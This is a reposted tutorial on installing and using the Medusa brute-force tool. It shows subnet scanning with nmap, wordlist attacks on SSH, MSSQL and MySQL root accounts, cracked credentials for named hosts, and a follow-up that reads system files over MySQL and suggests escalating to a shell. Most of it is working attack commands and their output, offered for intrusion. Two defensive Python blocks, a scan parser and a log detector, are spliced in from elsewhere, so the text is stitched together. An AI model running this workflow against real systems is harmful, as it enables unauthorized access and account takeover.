
[Repost] ssh medusa 2.0

陆子石
2023-12-01

sudo ./configure --enable-module-ssh=yes

When penetrating a Linux network environment, password cracking is indispensable. Below, an excellent password-cracking tool is introduced; first, download the tool.

Medusa is a good password-cracking program and reasonably fast. When using it you have to supply the IPs to crack: Medusa has no scanning function of its own and only reads individual IPs, so it needs to be combined with a tool such as nmap to obtain the list of IPs with the port open. Then set the username dictionary and password dictionary to try, and it can be run.

./medusa -H vnc.txt -U name.txt -P pass.txt -M vnc -O r.vnc.txt

vnc.txt is the list of IPs to run against that have VNC open.

name.txt: username dictionary

pass.txt: password dictionary

r.vnc.txt: file the results are saved to.

wget http://www.foofus.net/jmk/tools/medusa-2.0.tar.gz

or

curl -O http://www.foofus.net/jmk/tools/medusa-2.0.tar.gz

If libssh2 is not present, install it from http://www.libssh2.org/download/libssh2-1.2.6.tar.gz

If it was installed wrong, run make uninstall and reinstall; after installing, rm -rf libssh2-1.2.2. The installation steps are:

tar zxvf medusa-2.0.tar.gz

cd medusa-2.0

./configure

The current version is 2.0, but there is one thing that looks like a bug. On CentOS the default build does not include the ssh module, yet configure --help shows that module as defaulting to yes, i.e. it should be there. When building by hand you need to request the module explicitly:

./configure --prefix=/tools/medusa --enable-module-ssh=yes

Check that ssh appears in the output (enable_module_ssh); if it is absent, the build will have no ssh module.

make

make install

On Ubuntu, just sudo apt-get install libssh2; on other Linux systems it is as tedious as above.

After installation, use medusa -d to check that each module loads correctly; the following error often appears:

+ ssh.mod : Couldn't load "/usr/local/lib/medusa/modules/ssh.mod" [libssh2.so.1: cannot open shared object file: No such file or directory]

Although libssh2 is installed, the loader cannot find its path, so we have to add one by hand. The /etc directory contains a file called ld.so.conf that lists the default search paths for .so files, normally /lib and /usr/lib; the library we compiled was installed under /usr/local/lib, so that path has to be added and ldconfig run afterwards. The steps are:

 

cat /etc/ld.so.conf
include ld.so.conf.d/*.conf

ls ld.so.conf.d/

echo /usr/local/lib > /etc/ld.so.conf.d/local.conf
cat /etc/ld.so.conf.d/*
/usr/local/lib
/usr/lib/mysql
/usr/lib/qt-3.3/lib

ls -l /usr/local/lib/libssh*
-rw-r--r-- 1 root root 752936 06-25 14:33 /usr/local/lib/libssh2.a
-rwxr-xr-x 1 root root 827 06-25 14:33 /usr/local/lib/libssh2.la
lrwxrwxrwx 1 root root 16 06-25 14:33 /usr/local/lib/libssh2.so -> libssh2.so.1.0.1
lrwxrwxrwx 1 root root 16 06-25 14:33 /usr/local/lib/libssh2.so.1 -> libssh2.so.1.0.1
-rwxr-xr-x 1 root root 494064 06-25 14:33 /usr/local/lib/libssh2.so.1.0.1

ldconfig

 

Finally, check again whether everything resolves: ldd /usr/local/lib/medusa/modules/ssh.mod

Once the path is configured, use -d again to see whether the ssh module is now OK. Next comes the actual usage of Medusa:

# medusa

Medusa v1.5 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks

 

ALERT: Host information must be supplied.

 

Syntax: Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]

-h [TEXT] : Target hostname or IP address

-H [FILE] : File containing target hostnames or IP addresses

-u [TEXT] : Username to test

-U [FILE] : File containing usernames to test

-p [TEXT] : Password to test

-P [FILE] : File containing passwords to test

-C [FILE] : File containing combo entries. See README for more information.

-O [FILE] : File to append log information to

-e [n/s/ns] : Additional password checks ([n] No Password, [s] Password = Username)

-M [TEXT] : Name of the module to execute (without the .mod extension)

-m [TEXT] : Parameter to pass to the module. This can be passed multiple times with a

different parameter each time and they will all be sent to the module (i.e.

-m Param1 -m Param2, etc.)

-d : Dump all known modules

-n [NUM] : Use for non-default TCP port number

-s : Enable SSL

-g [NUM] : Give up after trying to connect for NUM seconds (default 3)

-r [NUM] : Sleep NUM seconds between retry attempts (default 3)

-R [NUM] : Attempt NUM retries before giving up. The total number of attempts will be NUM + 1.

-t [NUM] : Total number of logins to be tested concurrently

-T [NUM] : Total number of hosts to be tested concurrently

-L : Parallelize logins using one username per thread. The default is to process

the entire username before proceeding.

-f : Stop scanning host after first valid username/password found.

-F : Stop audit after first valid username/password found on any host.

-b : Suppress startup banner

-q : Display module’s usage information

-v [NUM] : Verbose level [0 - 6 (more)]

-w [NUM] : Error debug level [0 - 10 (more)]

-V : Display version

-Z [NUM] : Resume scan from host #

 

Now let's look at which modules Medusa has and what it supports cracking:

# medusa -d

Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks

 

Available modules in "." :

Available modules in "/usr/local/lib/medusa/modules" :

+ cvs.mod : Brute force module for CVS sessions : version 2.0

+ ftp.mod : Brute force module for FTP/FTPS sessions : version 2.0

+ http.mod : Brute force module for HTTP : version 2.0

+ imap.mod : Brute force module for IMAP sessions : version 2.0

+ mssql.mod : Brute force module for M$-SQL sessions : version 2.0

+ mysql.mod : Brute force module for MySQL sessions : version 2.0

+ nntp.mod : Brute force module for NNTP sessions : version 2.0

+ pcanywhere.mod : Brute force module for PcAnywhere sessions : version 2.0

+ pop3.mod : Brute force module for POP3 sessions : version 2.0

+ rexec.mod : Brute force module for REXEC sessions : version 2.0

+ rlogin.mod : Brute force module for RLOGIN sessions : version 2.0

+ rsh.mod : Brute force module for RSH sessions : version 2.0

+ smbnt.mod : Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions : version 2.0

+ smtp-vrfy.mod : Brute force module for enumerating accounts via SMTP VRFY : version 2.0

+ smtp.mod : Brute force module for SMTP Authentication with TLS : version 2.0

+ snmp.mod : Brute force module for SNMP Community Strings : version 2.0

+ ssh.mod : Brute force module for SSH v2 sessions : version 2.0

+ telnet.mod : Brute force module for telnet sessions : version 2.0

+ vmauthd.mod : Brute force module for the VMware Authentication Daemon : version 2.0

+ vnc.mod : Brute force module for VNC sessions : version 2.0

+ web-form.mod : Brute force module for web forms : version 2.0

+ wrapper.mod : Generic Wrapper Module : version 2.0

 

The supported cracking targets are quite comprehensive, which is very useful for penetration testing. First we pick targets: scan for machines with SSH open, on any convenient subnet. Scan the whole subnet for machines with port 22 open, identify the service version, and save the result to a file named ssh:

nmap -sV -p22 -oG ssh 172.20.3.0/24

 

Interesting ports on 172.20.3.132:

PORT STATE SERVICE VERSION

22/tcp filtered ssh

MAC Address: 00:1E:4F:16:B9:DB (Unknown)

 

Interesting ports on 172.20.3.133:

PORT STATE SERVICE VERSION

22/tcp filtered ssh

MAC Address: 00:1E:4F:13:09:E5 (Unknown)

 

Interesting ports on 172.20.3.134:

PORT STATE SERVICE VERSION

22/tcp filtered ssh

MAC Address: 00:1E:4F:13:72:49 (Unknown)

 

………………

 

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 4.3 (protocol 2.0)

MAC Address: 00:26:B9:5E:77:7A (Unknown)

 

Interesting ports on 172.20.3.148:

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 4.3 (protocol 2.0)

MAC Address: 00:26:B9:5E:79:D0 (Unknown)

 

Interesting ports on 172.20.3.150:

PORT STATE SERVICE VERSION

22/tcp closed ssh

MAC Address: 00:1E:4F:16:B8:2F (Unknown)

 

Interesting ports on 172.20.3.151:

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)

MAC Address: 00:1E:4F:16:B9:EF (Unknown)

 

Interesting ports on 172.20.3.152:

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)

MAC Address: 00:1A:A0:1C:0B:C2 (Unknown)

 

Interesting ports on 172.20.3.254:

PORT STATE SERVICE VERSION

22/tcp filtered ssh

MAC Address: 00:10:DB:FF:22:E0 (Juniper Networks)

 

Nmap finished: 256 IP addresses (64 hosts up) scanned in 33.634 seconds

cat ssh

# Nmap 4.11 scan initiated Fri Jun 25 15:25:50 2010 as: nmap -sV -p22 -oG ssh 172.20.3.0/24

Host: 172.20.3.12 () Ports: 22/closed/tcp//ssh///

Host: 172.20.3.13 () Ports: 22/closed/tcp//ssh///

Host: 172.20.3.16 () Ports: 22/closed/tcp//ssh///

Host: 172.20.3.19 () Ports: 22/closed/tcp//ssh///

Host: 172.20.3.28 () Ports: 22/open/tcp//ssh//OpenSSH 3.9p1 (protocol 1.99)/

Host: 172.20.3.55 () Ports: 22/closed/tcp//ssh///

Host: 172.20.3.58 () Ports: 22/closed/tcp//ssh///

Host: 172.20.3.61 () Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/

Host: 172.20.3.62 () Ports: 22/open/tcp//ssh//OpenSSH 3.9p1 (protocol 1.99)/

 

# Nmap run completed at Fri Jun 25 15:26:24 2010 — 256 IP addresses (64 hosts up) scanned in 33.634 seconds

 

It looks like this. Here we need to tidy it up and extract the IPs that have SSH open; now the point of saving with -oG becomes clear.

grep 22/open ssh | cut -d " " -f 2 >>ssh1.txt

 

cat ssh1.txt

 

172.20.3.28

172.20.3.61

172.20.3.62

172.20.3.63

172.20.3.64
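As an added example (not code from the original post), a Python parser for the -oG file above that does what the grep/cut pipeline does and, from the defender's side, also flags hosts whose banner still advertises protocol 1.99 (SSH-1 fallback); the sample text is constructed from the listing above.

```python
import re
from typing import Dict, List

# Constructed sample of nmap -oG output, modelled on the `cat ssh` listing above.
SAMPLE_OG = """# Nmap 4.11 scan initiated Fri Jun 25 15:25:50 2010 as: nmap -sV -p22 -oG ssh 172.20.3.0/24
Host: 172.20.3.12 ()\tPorts: 22/closed/tcp//ssh///
Host: 172.20.3.28 ()\tPorts: 22/open/tcp//ssh//OpenSSH 3.9p1 (protocol 1.99)/
Host: 172.20.3.61 ()\tPorts: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/
Host: 172.20.3.254 ()\tPorts: 22/filtered/tcp//ssh///
# Nmap run completed at Fri Jun 25 15:26:24 2010 -- 256 IP addresses (64 hosts up) scanned in 33.634 seconds
"""

# Grepable format: "Host: <ip> (<name>)<TAB>Ports: <port>/<state>/<proto>/<owner>/<service>/<rpc>/<version>/, ..."
HOST_RE = re.compile(r"^Host:\s+(\S+)\s+\(.*?\)\s+Ports:\s+(.*)$")


def parse_grepable(text: str) -> List[Dict[str, object]]:
    """Return one record per open port found in nmap -oG output: host, port, service, version."""
    records = []
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue  # comment lines and hosts with no Ports: section
        host, ports = m.groups()
        for entry in ports.split("\t")[0].split(","):  # drop a trailing "Ignored State:" field
            fields = entry.strip().split("/")
            if len(fields) < 7 or fields[1] != "open":
                continue
            records.append({"host": host, "port": int(fields[0]),
                            "service": fields[4], "version": fields[6]})
    return records


def ssh_exposure(text: str) -> Dict[str, List[str]]:
    """Split hosts with SSH open by whether the banner still offers SSH-1 fallback (protocol 1.99)."""
    legacy, modern = [], []
    for r in parse_grepable(text):
        if r["service"] != "ssh":
            continue
        (legacy if "protocol 1.99" in str(r["version"]) else modern).append(str(r["host"]))
    return {"protocol1_fallback": legacy, "protocol2_only": modern}


if __name__ == "__main__":
    for group, hosts in ssh_exposure(SAMPLE_OG).items():
        print(group, hosts)
```

Hosts in the protocol1_fallback group are the ones an inventory should escalate first, since SSH-1 support is the older, weaker configuration.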

 

Load the ssh module to crack SSH:

medusa -H ssh1.txt -u root -P p.txt -M ssh

Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks

 

ACCOUNT CHECK: [ssh] Host: 172.20.3.28 (1 of 39, 0 complete) User: root (1 of 1, 0 complete) Password: aaaaaa (1 of 51 complete)

ACCOUNT CHECK: [ssh] Host: 172.20.3.28 (1 of 39, 0 complete) User: root (1 of 1, 0 complete) Password: 1234 (12 of 51 complete)

………………

Cracking means a long wait; SSH cracking is not fast. It is advisable to keep the dictionary to somewhere between a dozen and at most 100 common passwords, otherwise the run takes a long time. Alternatively, set -G and -T to speed cracking up a little.
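The run above is what a single-username wordlist attempt looks like from the attacker's console; as an added defender-side example (not from the original post), here is the same activity seen in the target's sshd log and a small detector for it. The log lines are constructed; the source address, thresholds and window are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime
from typing import Dict, Iterator, Tuple

# Constructed sshd log lines (syslog format) showing what a single-user wordlist run looks like on
# the target: many "Failed password" events from one source within seconds, then an "Accepted".
SAMPLE_AUTH_LOG = """Jun 26 10:42:31 srv sshd[4120]: Failed password for root from 172.20.3.9 port 51022 ssh2
Jun 26 10:42:31 srv sshd[4121]: Failed password for root from 172.20.3.9 port 51023 ssh2
Jun 26 10:42:32 srv sshd[4122]: Failed password for root from 172.20.3.9 port 51024 ssh2
Jun 26 10:42:32 srv sshd[4123]: Failed password for root from 172.20.3.9 port 51025 ssh2
Jun 26 10:42:33 srv sshd[4124]: Failed password for root from 172.20.3.9 port 51026 ssh2
Jun 26 10:42:34 srv sshd[4125]: Accepted password for root from 172.20.3.9 port 51027 ssh2
Jun 26 10:50:01 srv sshd[4130]: Failed password for alice from 10.0.0.5 port 40001 ssh2
Jun 26 10:55:07 srv sshd[4131]: Accepted publickey for alice from 10.0.0.5 port 40002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+\s+\d\d:\d\d:\d\d)\s+\S+\s+sshd\[\d+\]:\s+"
    r"(?P<result>Failed|Accepted)\s+\w+\s+for\s+(?:invalid user\s+)?(?P<user>\S+)"
    r"\s+from\s+(?P<src>\S+)\s+port\s+\d+"
)


def parse_sshd(text: str, year: int = 2010) -> Iterator[Tuple[datetime, str, str, str]]:
    """Yield (timestamp, result, user, source) for each sshd auth line; other lines are skipped."""
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if m:  # syslog timestamps carry no year, so one is supplied by the caller
            yield datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S"), m["result"], m["user"], m["src"]


def detect_bruteforce(text: str, threshold: int = 5, window_s: int = 60) -> Dict[str, dict]:
    """Flag sources with >= threshold failures inside window_s seconds; record a later success."""
    fails = defaultdict(list)  # source -> [(timestamp, user), ...] in log order
    alerts: Dict[str, dict] = {}
    for ts, result, user, src in parse_sshd(text):
        if result == "Failed":
            fails[src].append((ts, user))
            recent = [(t, u) for t, u in fails[src] if (ts - t).total_seconds() <= window_s]
            if len(recent) >= threshold:
                alerts[src] = {"failures": len(recent),
                               "users": sorted({u for _, u in recent}),
                               "success_after": alerts.get(src, {}).get("success_after")}
        elif result == "Accepted" and src in alerts:
            alerts[src]["success_after"] = user  # guessing run then a login: treat as likely compromise
    return alerts
```

The -t/-T concurrency settings on the attacker's side only make this pattern denser, so a per-source rate threshold catches it regardless of the wordlist size.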

 

It is also worth scanning for SQL...

nmap -sV -oG mssql 172.20.0-5.1-254 -p1433    # scans 172.20.0.1 through 172.20.5.254

 

grep 1433/open mssql | cut -d ” ” -f 2 >>mssql.txt

 

medusa -H mssql.txt -u sa -P mssql_pass.dic -M mssql

 

Nothing was cracked; let's try cracking MySQL instead:

# medusa -H mysql.txt -u root -P p.txt -M mysql -O pass.log    # results are written to pass.log

 

cat pass.log

# Medusa v.2.0 (2010-06-26 10:42:32)

# medusa -H mysql.txt -u root -P p.txt -M mysql -O pass.log

ACCOUNT FOUND: [mysql] Host: 172.20.1.115 User: root Password: 12345678 [SUCCESS]

ACCOUNT FOUND: [mysql] Host: 172.20.3.58 User: root Password: mysql [SUCCESS]

# Medusa has finished (2010-06-26 10:55:11).

 

Not bad luck. Next, connect to the MySQL instance on 172.20.1.115 with jspshell and run:

select load_file('c:/boot.ini');

[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(2)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(2)\WINDOWS="Windows Server 2003, Enterprise" /fastdetect /NoExecute=OptIn

So it is Windows 2003; one could go on to write a UDF to get a shell...

 

Finally, the official notes: http://www.foofus.net/~jmk/medusa/ChangeLog